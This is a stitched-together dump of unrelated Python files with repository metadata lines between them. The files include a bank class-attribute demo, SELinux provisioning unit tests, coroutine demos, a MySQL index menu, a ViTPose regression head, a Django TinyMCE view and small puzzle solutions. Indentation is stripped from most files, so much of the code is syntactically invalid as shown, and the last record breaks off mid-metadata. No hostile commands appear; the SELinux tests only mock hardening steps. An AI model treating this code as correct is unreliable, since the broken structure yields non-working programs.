"""
class ICBC:
"""
demo02:
工商银行
"""
# 表示总行的钱
total_money = 1000000 # 这不是对象的数据,这是类的数据
# 因为类方法没有对象地址self,所以不能访问实例成员
@classmethod
def print_total_money(cls):
# print(id(cls),id(ICBC))
print("总行还剩%d钱" % ICBC.total_money)
def __init__(self, name, money): # 这些才是对象的数据
self.name = name
self.money = money
        # Deduct the amount used by this branch from the head-office total
ICBC.total_money -= money
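# Demo: each branch constructed below deducts its funding from the shared class
# attribute, so the two calls print a shrinking head-office total.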
i01 = ICBC("广渠门支行", 100000)
ICBC.print_total_money()
i02 = ICBC("陶然亭支行", 100000)
# print("总行还剩%d钱" % ICBC.total_money)
# 通过类名访问类方法,会将类名传入类方法.
ICBC.print_total_money()
cd15735e33041560a98ded732972d3b02180e502 | d6815f4c7774d30c5d12d2205703427693294dec | /tests/unit/more/debian/security/test_selinux.py | af2403dca31f2fdbb42f262bc50c9f76b86bba2a | [
"MIT"
]
| permissive | python-provy/provy | 2579bbedc31f559992b7c007a4a2e75424d3507f | ca3d5e96a2210daf3c1fd4b96e047efff152db14 | refs/heads/master | 2021-12-30T12:03:28.083794 | 2019-02-20T16:55:32 | 2019-02-20T16:55:32 | 1,948,340 | 16 | 3 | MIT | 2021-12-26T06:30:37 | 2011-06-24T16:01:45 | Python | UTF-8 | Python | false | false | 4,010 | py |
from mock import call, patch
from nose.tools import istest
from provy.more.debian import AptitudeRole, SELinuxRole
from tests.unit.tools.helpers import ProvyTestCase
class SELinuxRoleTest(ProvyTestCase):
def setUp(self):
super(SELinuxRoleTest, self).setUp()
self.role = SELinuxRole(prov=None, context={'cleanup': []})
@istest
def provisions_correctly(self):
with self.mock_role_methods('install_packages', 'activate'):
self.role.provision()
self.role.install_packages.assert_called_with()
self.role.activate.assert_called_with()
@istest
def installs_packages_in_debian(self):
with self.using_stub(AptitudeRole) as aptitude, self.provisioning_to('debian'):
self.role.install_packages()
expected_packages = [
call('selinux-basics'),
call('selinux-policy-default'),
call('selinux-utils'),
call('auditd'),
call('audispd-plugins'),
]
self.assertEqual(aptitude.ensure_package_installed.mock_calls, expected_packages)
@istest
def installs_packages_in_ubuntu(self):
with self.using_stub(AptitudeRole) as aptitude, self.provisioning_to('ubuntu'):
self.role.install_packages()
expected_packages = [
call('selinux'),
call('selinux-utils'),
call('auditd'),
call('audispd-plugins'),
]
self.assertEqual(aptitude.ensure_package_installed.mock_calls, expected_packages)
@istest
def activates_on_debian(self):
with self.execute_mock() as execute, self.provisioning_to('debian'), patch.object(self.role, 'enforce'):
self.role.activate()
expected_calls = [
call('selinux-activate', stdout=False, sudo=True),
call("semanage login -m -s 'user_u' -r s0 __default__", stdout=False, sudo=True),
]
self.assertEqual(execute.mock_calls, expected_calls)
self.role.enforce.assert_called_with()
@istest
def activates_on_ubuntu(self):
with self.execute_mock() as execute, self.provisioning_to('ubuntu'), patch.object(self.role, 'enforce'):
self.role.activate()
expected_calls = [
call("semanage login -m -s 'user_u' -r s0 __default__", stdout=False, sudo=True),
]
self.assertEqual(execute.mock_calls, expected_calls)
self.role.enforce.assert_called_with()
@istest
def puts_environment_in_enforce_mode(self):
with self.execute_mock(), self.mock_role_method('ensure_line'), self.warn_only():
self.role.enforce()
self.role.execute.assert_called_with('setenforce 1', stdout=False, sudo=True)
self.role.ensure_line.assert_called_with('SELINUX=enforcing', '/etc/selinux/config', sudo=True)
@istest
def ensures_that_a_login_mapping_exists(self):
with self.execute_mock() as execute, self.warn_only():
self.role.ensure_login_mapping('foo')
execute.assert_called_with('semanage login -a foo', stdout=False, sudo=True)
@istest
def maps_a_login_user_to_an_selinux_user(self):
with self.execute_mock() as execute, patch.object(self.role, 'ensure_login_mapping'):
self.role.map_login('foo', 'staff_u')
self.role.ensure_login_mapping.assert_called_with('foo')
execute.assert_called_with('semanage login -m -s staff_u foo', stdout=False, sudo=True)
@istest
def maps_a_login_user_to_selinux_roles(self):
with self.execute_mock() as execute, patch.object(self.role, 'ensure_login_mapping'):
self.role.map_role('foo', ['staff_r', 'sysadm_r'])
self.role.ensure_login_mapping.assert_called_with('foo')
execute.assert_called_with("semanage user -m -R 'staff_r sysadm_r' foo", stdout=False, sudo=True)
9b6a7efd933b95b6d869bcec2a89469658c6997c | 22f480f1ec13e59f1bcf4a244973db64f875e0db | /coroutine_test.py | 42b3accced3c46d5ec3c57341d831fd9e94cd443 | []
| no_license | xiphodon/spider_hs_code | de3a4a555be2ed9dac295ef93a921c3697a6bc6a | c447c94c367c029fc13af458c668eb1f87a7b67c | refs/heads/master | 2021-12-27T23:11:07.925493 | 2021-12-16T16:41:34 | 2021-12-16T16:41:34 | 105,999,246 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,598 | py |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/5/10 9:45
# @Author : GuoChang
# @Site : https://github.com/xiphodon
# @File : coroutine_test.py
# @Software: PyCharm
"""协程测试"""
def consumer():
print('==== c_A ====')
r = ''
while True:
print('==== c_B ====')
n = yield r
print('==== c_C ====')
if not n:
return
print('[CONSUMER] Consuming %s...' % n)
r = '200 OK'
print('==== c_D ====')
def produce(c):
print('==== p_A ====')
r = c.send(None)
print('[PRODUCER] c.send(None) %s...' % r)
n = 0
print('==== p_B ====')
while n < 5:
n = n + 1
print('[PRODUCER] Producing %s...' % n)
print('==== p_C ====')
r = c.send(n)
print('==== p_D ====')
print('[PRODUCER] Consumer return: %s' % r)
c.close()
print('==== p_E ====')
def start_1():
c = consumer()
produce(c)
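# start_1() wires the pair together: produce() primes consumer() with send(None),
# then every send(n) resumes the coroutine with a value and receives '200 OK'
# back; close() finally raises GeneratorExit inside the consumer.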
def generator_1():
total = 0
while True:
x = yield
        print('adding', x)
if not x:
return total
total += x
def generator_2():  # delegating generator
    while True:
        print('while True')
        total = yield from generator_1()  # subgenerator
        print('The summed total is:', total)
def start_2():  # the caller
g1 = generator_1()
g1.send(None)
g1.send(2)
g1.send(3)
g1.send(None)
def start_3():
g2 = generator_2()
g2.send(None)
g2.send(2)
g2.send(3)
g2.send(None)
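# Expected flow of start_3() (sketch): the first send(None) primes generator_2,
# which delegates into generator_1 via "yield from"; send(2) and send(3)
# accumulate to 5; the last send(None) makes generator_1 return, so generator_2
# prints the total and loops into a fresh subgenerator. start_2(), by contrast,
# would end with StopIteration, because generator_1 returns while driven directly.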
if __name__ == '__main__':
# start_1()
# start_2()
start_3()
c6fd884951bb2eeb1d9b7ce2023f5052fe299ee0 | a1504798a55d652c9c0705cc507fe2cb9678ea4f | /Adavnce_CRUD/MySQL_Index/main.py | d3dc0fb9d8d0d67cb6cb139875050e8b004effdf | []
| no_license | ritikapatel1410/Python_MySql | a4a952abd7b0394eafc071de0f55efd6a7a3b359 | d90da25391243d5c08156a9184727c3e42e43517 | refs/heads/main | 2023-03-21T01:24:02.465879 | 2021-03-18T07:55:04 | 2021-03-18T07:55:04 | 347,563,406 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,533 | py |
"""
@Author: Ritika Patidar
@Date: 2021-03-15 00:10:10
@Last Modified by: Ritika Patidar
@Last Modified time: 2021-03-15 00:10:38
@Title : entry point for the MySQL index operations
"""
import sys
import os
sys.path.insert(0,os.path.relpath("LogFile"))
import loggerfile
from Mysql_Index import Index_Operation
def main():
"""
Description:
this function is define for mode of different operation of index
Parameter:
None
Return:
None
"""
try:
Obj_Index_Operation=Index_Operation()
mode=int(input("================================= Select Mode For index =====================================\n0 : Create Index\n====================================\n1 : Explain Index\n==============================================\n2 : Show Index\n==================================================================\n3 : Drop Index\n=============================================\n4 : quit\n=================================================================\nenter : "))
if(mode==0):
print(Obj_Index_Operation.Create_Index())
elif(mode==1):
print(Obj_Index_Operation.Explain_Index())
elif(mode==2):
Obj_Index_Operation.Show_Index()
elif(mode==3):
print(Obj_Index_Operation.Drop_Index())
elif(mode==4):
sys.exit()
loggerfile.Logger("info","succesfully select the mode")
except Exception as error:
loggerfile.Logger("error","{0} error occured".format(error))
main()
19caeba9c0e61aa8f31b56683c06fdeaf2f2a064 | 6ed034d0a5e239d7b0c528b287451409ffb4a494 | /mmpose/models/heads/temporal_regression_head.py | 97a07f9cf2c9ef0497380ca5c602142b206f3b52 | [
"Apache-2.0"
]
| permissive | ViTAE-Transformer/ViTPose | 8f9462bd5bc2fb3e66de31ca1d03e5a9135cb2bf | d5216452796c90c6bc29f5c5ec0bdba94366768a | refs/heads/main | 2023-05-23T16:32:22.359076 | 2023-03-01T06:42:22 | 2023-03-01T06:42:22 | 485,999,907 | 869 | 132 | Apache-2.0 | 2023-03-01T06:42:24 | 2022-04-27T01:09:19 | Python | UTF-8 | Python | false | false | 12,400 | py |
# Copyright (c) OpenMMLab. All rights reserved.
import numpy as np
import torch.nn as nn
from mmcv.cnn import build_conv_layer, constant_init, kaiming_init
from mmcv.utils.parrots_wrapper import _BatchNorm
from mmpose.core import (WeightNormClipHook, compute_similarity_transform,
fliplr_regression)
from mmpose.models.builder import HEADS, build_loss
@HEADS.register_module()
class TemporalRegressionHead(nn.Module):
"""Regression head of VideoPose3D.
"3D human pose estimation in video with temporal convolutions and
semi-supervised training", CVPR'2019.
Args:
in_channels (int): Number of input channels
num_joints (int): Number of joints
loss_keypoint (dict): Config for keypoint loss. Default: None.
max_norm (float|None): if not None, the weight of convolution layers
will be clipped to have a maximum norm of max_norm.
is_trajectory (bool): If the model only predicts root joint
position, then this arg should be set to True. In this case,
traj_loss will be calculated. Otherwise, it should be set to
False. Default: False.
"""
def __init__(self,
in_channels,
num_joints,
max_norm=None,
loss_keypoint=None,
is_trajectory=False,
train_cfg=None,
test_cfg=None):
super().__init__()
self.in_channels = in_channels
self.num_joints = num_joints
self.max_norm = max_norm
self.loss = build_loss(loss_keypoint)
self.is_trajectory = is_trajectory
if self.is_trajectory:
assert self.num_joints == 1
self.train_cfg = {} if train_cfg is None else train_cfg
self.test_cfg = {} if test_cfg is None else test_cfg
self.conv = build_conv_layer(
dict(type='Conv1d'), in_channels, num_joints * 3, 1)
if self.max_norm is not None:
# Apply weight norm clip to conv layers
weight_clip = WeightNormClipHook(self.max_norm)
for module in self.modules():
if isinstance(module, nn.modules.conv._ConvNd):
weight_clip.register(module)
@staticmethod
def _transform_inputs(x):
"""Transform inputs for decoder.
Args:
inputs (tuple or list of Tensor | Tensor): multi-level features.
Returns:
Tensor: The transformed inputs
"""
if not isinstance(x, (list, tuple)):
return x
assert len(x) > 0
# return the top-level feature of the 1D feature pyramid
return x[-1]
def forward(self, x):
"""Forward function."""
x = self._transform_inputs(x)
assert x.ndim == 3 and x.shape[2] == 1, f'Invalid shape {x.shape}'
output = self.conv(x)
N = output.shape[0]
return output.reshape(N, self.num_joints, 3)
def get_loss(self, output, target, target_weight):
"""Calculate keypoint loss.
Note:
- batch_size: N
- num_keypoints: K
Args:
output (torch.Tensor[N, K, 3]): Output keypoints.
target (torch.Tensor[N, K, 3]): Target keypoints.
target_weight (torch.Tensor[N, K, 3]):
Weights across different joint types.
If self.is_trajectory is True and target_weight is None,
target_weight will be set inversely proportional to joint
depth.
"""
losses = dict()
assert not isinstance(self.loss, nn.Sequential)
# trajectory model
if self.is_trajectory:
if target.dim() == 2:
target.unsqueeze_(1)
if target_weight is None:
target_weight = (1 / target[:, :, 2:]).expand(target.shape)
assert target.dim() == 3 and target_weight.dim() == 3
losses['traj_loss'] = self.loss(output, target, target_weight)
# pose model
else:
if target_weight is None:
target_weight = target.new_ones(target.shape)
assert target.dim() == 3 and target_weight.dim() == 3
losses['reg_loss'] = self.loss(output, target, target_weight)
return losses
def get_accuracy(self, output, target, target_weight, metas):
"""Calculate accuracy for keypoint loss.
Note:
- batch_size: N
- num_keypoints: K
Args:
output (torch.Tensor[N, K, 3]): Output keypoints.
target (torch.Tensor[N, K, 3]): Target keypoints.
target_weight (torch.Tensor[N, K, 3]):
Weights across different joint types.
metas (list(dict)): Information about data augmentation including:
- target_image_path (str): Optional, path to the image file
- target_mean (float): Optional, normalization parameter of
the target pose.
- target_std (float): Optional, normalization parameter of the
target pose.
- root_position (np.ndarray[3,1]): Optional, global
position of the root joint.
- root_index (torch.ndarray[1,]): Optional, original index of
the root joint before root-centering.
"""
accuracy = dict()
N = output.shape[0]
output_ = output.detach().cpu().numpy()
target_ = target.detach().cpu().numpy()
# Denormalize the predicted pose
if 'target_mean' in metas[0] and 'target_std' in metas[0]:
target_mean = np.stack([m['target_mean'] for m in metas])
target_std = np.stack([m['target_std'] for m in metas])
output_ = self._denormalize_joints(output_, target_mean,
target_std)
target_ = self._denormalize_joints(target_, target_mean,
target_std)
# Restore global position
if self.test_cfg.get('restore_global_position', False):
root_pos = np.stack([m['root_position'] for m in metas])
root_idx = metas[0].get('root_position_index', None)
output_ = self._restore_global_position(output_, root_pos,
root_idx)
target_ = self._restore_global_position(target_, root_pos,
root_idx)
# Get target weight
if target_weight is None:
target_weight_ = np.ones_like(target_)
else:
target_weight_ = target_weight.detach().cpu().numpy()
if self.test_cfg.get('restore_global_position', False):
root_idx = metas[0].get('root_position_index', None)
root_weight = metas[0].get('root_joint_weight', 1.0)
target_weight_ = self._restore_root_target_weight(
target_weight_, root_weight, root_idx)
mpjpe = np.mean(
np.linalg.norm((output_ - target_) * target_weight_, axis=-1))
transformed_output = np.zeros_like(output_)
for i in range(N):
transformed_output[i, :, :] = compute_similarity_transform(
output_[i, :, :], target_[i, :, :])
p_mpjpe = np.mean(
np.linalg.norm(
(transformed_output - target_) * target_weight_, axis=-1))
accuracy['mpjpe'] = output.new_tensor(mpjpe)
accuracy['p_mpjpe'] = output.new_tensor(p_mpjpe)
return accuracy
def inference_model(self, x, flip_pairs=None):
"""Inference function.
Returns:
output_regression (np.ndarray): Output regression.
Args:
x (torch.Tensor[N, K, 2]): Input features.
flip_pairs (None | list[tuple()):
Pairs of keypoints which are mirrored.
"""
output = self.forward(x)
if flip_pairs is not None:
output_regression = fliplr_regression(
output.detach().cpu().numpy(),
flip_pairs,
center_mode='static',
center_x=0)
else:
output_regression = output.detach().cpu().numpy()
return output_regression
def decode(self, metas, output):
"""Decode the keypoints from output regression.
Args:
metas (list(dict)): Information about data augmentation.
By default this includes:
- "target_image_path": path to the image file
output (np.ndarray[N, K, 3]): predicted regression vector.
metas (list(dict)): Information about data augmentation including:
- target_image_path (str): Optional, path to the image file
- target_mean (float): Optional, normalization parameter of
the target pose.
- target_std (float): Optional, normalization parameter of the
target pose.
- root_position (np.ndarray[3,1]): Optional, global
position of the root joint.
- root_index (torch.ndarray[1,]): Optional, original index of
the root joint before root-centering.
"""
# Denormalize the predicted pose
if 'target_mean' in metas[0] and 'target_std' in metas[0]:
target_mean = np.stack([m['target_mean'] for m in metas])
target_std = np.stack([m['target_std'] for m in metas])
output = self._denormalize_joints(output, target_mean, target_std)
# Restore global position
if self.test_cfg.get('restore_global_position', False):
root_pos = np.stack([m['root_position'] for m in metas])
root_idx = metas[0].get('root_position_index', None)
output = self._restore_global_position(output, root_pos, root_idx)
target_image_paths = [m.get('target_image_path', None) for m in metas]
result = {'preds': output, 'target_image_paths': target_image_paths}
return result
@staticmethod
def _denormalize_joints(x, mean, std):
"""Denormalize joint coordinates with given statistics mean and std.
Args:
x (np.ndarray[N, K, 3]): Normalized joint coordinates.
mean (np.ndarray[K, 3]): Mean value.
std (np.ndarray[K, 3]): Std value.
"""
assert x.ndim == 3
assert x.shape == mean.shape == std.shape
return x * std + mean
@staticmethod
def _restore_global_position(x, root_pos, root_idx=None):
"""Restore global position of the root-centered joints.
Args:
x (np.ndarray[N, K, 3]): root-centered joint coordinates
root_pos (np.ndarray[N,1,3]): The global position of the
root joint.
root_idx (int|None): If not none, the root joint will be inserted
back to the pose at the given index.
"""
x = x + root_pos
if root_idx is not None:
x = np.insert(x, root_idx, root_pos.squeeze(1), axis=1)
return x
@staticmethod
def _restore_root_target_weight(target_weight, root_weight, root_idx=None):
"""Restore the target weight of the root joint after the restoration of
the global position.
Args:
target_weight (np.ndarray[N, K, 1]): Target weight of relativized
joints.
root_weight (float): The target weight value of the root joint.
root_idx (int|None): If not none, the root joint weight will be
inserted back to the target weight at the given index.
"""
if root_idx is not None:
root_weight = np.full(
target_weight.shape[0], root_weight, dtype=target_weight.dtype)
target_weight = np.insert(
target_weight, root_idx, root_weight[:, None], axis=1)
return target_weight
def init_weights(self):
"""Initialize the weights."""
for m in self.modules():
if isinstance(m, nn.modules.conv._ConvNd):
kaiming_init(m, mode='fan_in', nonlinearity='relu')
elif isinstance(m, _BatchNorm):
constant_init(m, 1)
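# Minimal usage sketch (not part of the original file; the loss config and
# shapes are assumptions based on the docstrings above, and `import torch` is
# implied):
#   head = TemporalRegressionHead(in_channels=1024, num_joints=17,
#                                 loss_keypoint=dict(type='MPJPELoss'))
#   feats = torch.randn(4, 1024, 1)  # (N, C, T=1) single-frame features
#   preds = head(feats)              # -> tensor of shape (4, 17, 3)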
f70e05449d250838b42f4c3df78e59421ddc3543 | a2f9d55d686425c4b47ce150aa1a23ea933055cc | /apps/tinymce/views.py | 12c563915b667935e080b56611e1df8b35b9ad48 | []
| no_license | wd5/blombum | b31c581f2c36c220164901189be1ba95a8341e0e | fe11efb369fe2cec67af1e79bc8935a266df2f80 | refs/heads/master | 2020-12-25T02:23:30.297939 | 2010-06-29T10:03:31 | 2010-06-29T10:03:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py |
import re
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import Http404, HttpResponseRedirect
from settingsDB.utils import SettingsCached
def read_path(request, path):
if re.search('(jpg|png|jpeg|gif)$', path):
return HttpResponseRedirect(SettingsCached.param.STATIC_URL+'js/tinymce/'+path)
return render_to_response('tinymce/'+path, RequestContext(request))
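# Illustrative behaviour (paths assumed, not from the original code): a
# request for 'themes/advanced/img/icon.gif' matches the image-extension
# regex and is redirected to
# STATIC_URL + 'js/tinymce/themes/advanced/img/icon.gif', while a request
# for 'plugin.html' falls through and renders the template
# 'tinymce/plugin.html'.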
| [
"[email protected]"
]
| |
b7bf34e25705b43a0a78936098833e47fe524ace | 96fe7cb1495928a9699ade24200b445755e47f3b | /tests/unit/model/test_code_element_role.py | 62f8ec8dfa551f1d335a31db5755fcbc031c51df | [
"Apache-2.0"
]
| permissive | Midnighter/structurizr-python | ab4a9f71c01d1febde5c6e61a3a961953f1ef440 | 31f1dcadb3ff113d8a77ce132657237ea01c307b | refs/heads/devel | 2023-02-08T19:43:22.344155 | 2023-01-21T10:12:49 | 2023-01-21T10:12:49 | 144,895,441 | 61 | 16 | Apache-2.0 | 2023-01-21T09:53:35 | 2018-08-15T19:35:01 | Python | UTF-8 | Python | false | false | 1,037 | py | # Copyright (c) 2020, Moritz E. Beber.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ensure the expected behaviour of the code element role enumeration."""
import pytest
from structurizr.model.code_element_role import CodeElementRole
@pytest.mark.parametrize(
"role, expected",
[("Primary", CodeElementRole.Primary), ("Supporting", CodeElementRole.Supporting)],
)
def test_code_element_role(role: str, expected: CodeElementRole):
"""Expect proper initialization from string."""
assert CodeElementRole(role) == expected
| [
"[email protected]"
]
| |
32a23f9df83cc51dbe7edb439bd22dbc167ade77 | 13d222bc3332378d433835914da26ed16b583c8b | /src/pemjh/challenge116/main.py | 83123ed7d1f367503d574aa5a8a7a8a0a060e775 | []
| no_license | mattjhussey/pemjh | c27a09bab09cd2ade31dc23fffac07374bea9366 | 2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99 | refs/heads/master | 2023-04-16T03:08:59.390698 | 2023-04-08T10:54:00 | 2023-04-08T10:54:00 | 204,912,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 916 | py | """ Challenge116 """
# pylint: disable=missing-docstring
from pemjh.function_tools import memoize
@memoize()
def num_variations(blocks, tile_size, dec=True):
num = 0
if blocks > 1:
# work out with tile here
if blocks >= tile_size:
num += num_variations(blocks - tile_size,
tile_size,
False)
# work out with tile not here
num += num_variations(blocks - 1, tile_size, False)
else:
num = 1
if dec:
num -= 1
return num
def process(blocks):
num_2_variations = num_variations(blocks, 2)
num_3_variations = num_variations(blocks, 3)
num_4_variations = num_variations(blocks, 4)
return num_2_variations + num_3_variations + num_4_variations
def main(blocks):
""" challenge116 """
return process(blocks)
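# Illustrative check (expected values taken from Project Euler problem 116's
# worked example, assumed here): for a row of 5 blocks there are 7 tilings
# with red (length-2) tiles, 3 with green (length-3) tiles and 2 with blue
# (length-4) tiles, so main(5) == 7 + 3 + 2 == 12.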
| [
"[email protected]"
]
| |
02eaf3db773ab02db6f4b89bf7367f023bcb00d3 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_aggregated.py | fad5b0d4f6fa9ecaef3cf929a8aed423b13aacbd | [
"MIT"
]
| permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py |
from xai.brain.wordbase.adjectives._aggregate import _AGGREGATE
#calss header
class _AGGREGATED(_AGGREGATE, ):
def __init__(self,):
_AGGREGATE.__init__(self)
self.name = "AGGREGATED"
self.specie = 'adjectives'
self.basic = "aggregate"
self.jsondata = {}
| [
"[email protected]"
]
| |
bd0ddc98cc185bd0c345391c4fd04ccb8f855b0f | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /rnvBtoNMBtznXLhs8_24.py | 3666f1e694da00a3301b67e01f1e0199407af097 | []
| no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py |
def win_round(you, opp):
res = []
for item in [you, opp]:
first = max(item)
item.remove(first)
second = max(item)
res.append(int(str(first) + str(second)))
you_score, opp_score = res
if you_score > opp_score:
return True
return False
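# Illustrative checks (dice values assumed, not from the original code):
# win_round([2, 5, 2], [6, 1, 3]) compares 52 against 63 and returns False;
# win_round([9, 2, 3], [5, 5, 6]) compares 93 against 65 and returns True.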
| [
"[email protected]"
]
| |
297a221039f6223d99486f0a5574016946b8bb72 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5670465267826688_1/Python/Saaber/saber_dijkstra.py | 07db2c9ea613fb670076171aa5363a1bcd777e85 | []
| no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,509 | py | d = {'11':'1', '1i':'i', '1j':'j', '1k':'k', \
'i1':'i', 'ii':'-1' , 'ij':'k', 'ik':'-j', \
'j1':'j', 'ji':'-k' , 'jj':'-1', 'jk':'i', \
'k1':'k', 'ki':'j' , 'kj':'-i', 'kk':'-1' }
def evaluate(s1, s2):
neg1, neg2 = s1.count('-') , s2.count('-')
t1, t2 = s1.replace('-',''), s2.replace('-','')
neg = neg1 + neg2
key = t1 + t2
res = d[key]
if (neg % 2) == 1:
if res[0] == '-':
res = res[1:]
else:
res = '-' + res
return res
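# Illustrative checks of the sign-aware quaternion product (inputs assumed):
#   evaluate('i', 'j')  -> 'k'
#   evaluate('-i', 'j') -> '-k'
#   evaluate('i', 'i')  -> '-1'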
def evaluate_substring(substr, result, flag_i, flag_ij):
if result == 'i':
flag_i = True
for i in xrange( len(substr)):
result = evaluate(result, substr[i])
if result == 'i' and flag_i == False:
flag_i = True
if result == 'k' and flag_i == True:
flag_ij = True
return result, flag_i, flag_ij
def power(a, b):
result = 1
ijop = 1
if b == 1 or a == '1':
return a
if a not in ['-1' , '1']:
result = evaluate(a, a)
result = pow(int(result) , int(b/2))
if (b %2 ) == 1:
result = evaluate(str(result), a)
else:
if (b % 2) == 0:
result = 1
else:
result = -1
ijop = -1
return str(result)
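# Illustrative check (inputs assumed): power('i', 3) first squares 'i' to
# '-1', raises that to b // 2 == 1, then multiplies by 'i' once more for the
# odd exponent, returning '-i' (i.e. i**3 == -i).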
def evaluate_string(x, repeat):
res, flag_i, flag_ij = '1', False, False
f_r = 1
    # result of the first pass through the string, initially empty
res_x = ''
for i in xrange(repeat):
res, flag_i, flag_ij = evaluate_substring(x, res, flag_i, flag_ij)
if i == 0:
res_x = res
p = power(res, repeat)
#print ' p = ' + str(p)
if p != '-1':
return False
# for sure if it didn't find i and j, then it can't find it anymore
if i > 100000:
return False
if flag_i == True and flag_ij == True:
return True
if res == '-1' and flag_ij == True:
return True
return False
def main():
f_name = 'C-large.in.txt'
fh = open(f_name, 'rt')
line = fh.readline()
test_cases = int(line)
result = ''
for i in xrange(1, test_cases+ 1):
line1 = fh.readline().replace('\n','')
line2 = fh.readline().replace('\n','')
repeat = int(line1.split(' ')[1])
string = ''
if len(line2) * repeat < 4:
string = str(line2) * repeat
if len(string) < 3:
result += 'Case #' + str(i) + ": NO\n"
continue
elif len(string) == 3:
if string == 'ijk':
result += 'Case #' + str(i ) + ": YES\n"
continue
else:
result += 'Case #' + str(i ) + ": NO\n"
continue
eval_str = evaluate_string(line2, repeat)
if eval_str == True:
result += 'Case #' + str( i ) + ": YES\n"
else:
result += 'Case #' + str(i ) + ": NO\n"
print result
fh.close()
f = open('saber_dijkstra.out', 'w')
f.write(result)
f.close()
main()
| [
"[email protected]"
]
| |
03ee163b9ac703119f8282805997115dac007738 | b6e5a79533b23404bf1582e9c66f4d1a9500b992 | /backend/usa_2_go_27981/wsgi.py | 067e6d4e56f68e483302e5793560ba8a17439f18 | []
| no_license | crowdbotics-apps/usa-2-go-27981 | 766add8314ebdeddfcc90ba2fe0185f66f247493 | 18ba1fa997814462fc7810b01c413cd7655c758b | refs/heads/master | 2023-05-27T10:25:39.406088 | 2021-06-15T01:03:53 | 2021-06-15T01:03:53 | 376,992,929 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py | """
WSGI config for usa_2_go_27981 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "usa_2_go_27981.settings")
application = get_wsgi_application()
| [
"[email protected]"
]
| |
fa02064419c1a25d7bb488b52884e661e606158d | 24e390b6b3ac60baa5ee784cc017848e7e6e8426 | /old_exercises/backup/plotlable.py | 78c3ebcb682d03d9a38f071e66fad895ae411985 | []
| no_license | tertiarycourses/NumpySciPyTraining | 6c83d91f7164e9cd3020fd987c55d15d93f2fcf3 | 0b45296cf07751938594973dd7fdc39d0daa04a1 | refs/heads/master | 2021-01-23T00:40:12.393829 | 2018-05-17T09:10:51 | 2018-05-17T09:10:51 | 92,831,280 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 173 | py | import numpy
import matplotlib.pyplot as plt
x=numpy.linspace(0,2*numpy.pi,32)
plt.plot(x, numpy.sin(x))
plt.xlabel('x')
plt.ylabel('y')
plt.title('Sine Curve')
plt.show()
| [
"[email protected]"
]
| |
9b0c90269a0a5ff5f89369b8ca2e2d59d97665fe | 7c0acdc46cfce5dc116d394f6990ee5ab1c0fa0c | /venv/lib/python3.7/site-packages/buildsystem/setup.py | 3e4ac13dece62dd1ea8f1f0ac6fe7d644541d600 | [
"MIT"
]
| permissive | Vatansever27/ExchangeCode | 84fb4a02371fdda7cd94d00971be76bcd1068be0 | ab284653a337937139a9a28c036efe701fb376c7 | refs/heads/master | 2020-04-07T16:38:59.819929 | 2018-11-21T12:18:30 | 2018-11-21T12:18:30 | 158,537,067 | 0 | 0 | null | 2018-11-21T12:18:31 | 2018-11-21T11:22:14 | null | UTF-8 | Python | false | false | 1,093 | py | from .base import BaseBuilder, task
import os
class SetupBuilder(BaseBuilder):
setupdir = '.'
setupscript = None
product_title = 'Setup'
@task('compile_setup')
def do_compile_setup(self):
        '''Compile the Inno Setup script `setupscript` from within the directory `setupdir`, if `setupscript` is specified and exists.
        `setupscript` must be given as a path relative to `setupdir`.'''
if self.setupscript and os.path.exists(os.path.join(self.setupdir, self.setupscript)):
d = os.getcwd()
os.chdir(self.setupdir)
# write version information into git.txt
with open('git.txt', 'w') as f:
f.write(self.version)
# run setup
self.run([r'C:\Program Files (x86)\Inno Setup 5\ISCC.exe', self.setupscript])
# remove git.txt
os.remove('git.txt')
os.chdir(d)
else:
raise Exception('Setup script does not exist: %s' % os.path.join(self.setupdir, self.setupscript))
| [
"[email protected]"
]
| |
c88e91b305ed920b0d4f97c56d7ec0ebf48c216c | 20c67cd43a484819b13cb120f145def9bc1317d8 | /usermage/views.py | d3063cfebd5ca6ec7725f323504b5493b4885c36 | []
